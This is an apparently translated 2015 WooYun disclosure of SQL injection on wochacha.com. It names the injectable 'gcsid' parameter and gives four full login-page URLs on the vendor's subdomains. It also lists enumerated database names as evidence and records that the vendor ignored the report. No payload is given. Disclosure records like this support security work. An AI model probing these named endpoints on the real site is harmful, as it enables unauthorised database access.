
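Vulnerability Summary

Bug ID: wooyun-2015-0132374

Vulnerability title: Multiple SQL injections on a Wochacha (我查查) site, submitted as a batch (8 databases involved)

Affected vendor: wochacha.com

Vulnerability author: 路人甲

Submission time: 2015-08-07 16:47

Fix time: 2015-08-12 16:48

Public disclosure time: 2015-08-12 16:48

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Vulnerability status: The vendor was notified of the vulnerability but ignored it

Vulnerability source: http://www.wooyun.org. For questions or help, contact [email protected]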


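Vulnerability Details

Disclosure status:

2015-08-07: Details reported to the vendor; awaiting vendor handling
2015-08-12: The vendor actively ignored the vulnerability; details disclosed to the public

Brief description:

Detailed description: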

http://wap.wochacha.com/index/login?gcsid=3266eb92c42c61e960796c0372e1bd60


http://wphone.wochacha.com/index/login?gcsid=3266eb92c42c61e960796c0372e1bd60


http://symbian.wochacha.com/index/login?gcsid=3266eb92c42c61e960796c0372e1bd60


http://android.wochacha.com/index/login?gcsid=3266eb92c42c61e960796c0372e1bd60


Different sites; the gcsid parameter is injectable on each.

available databases [8]:
[*] `\t`
[*] `\x02`
[*] `\x02A`
[*] gcore
[*] gcoreinc
[*] information_schema
[*] mysql
[*] securi

Proof of vulnerability:




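Remediation:

Copyright notice: when reposting, credit the source 路人甲@乌云


Vulnerability Response

Vendor response:

Severity: No impact (ignored by vendor)

Ignored at: 2015-08-12 16:48

Vendor reply:

Vulnerability Rank: 15 (WooYun rating)

Latest status:

None yet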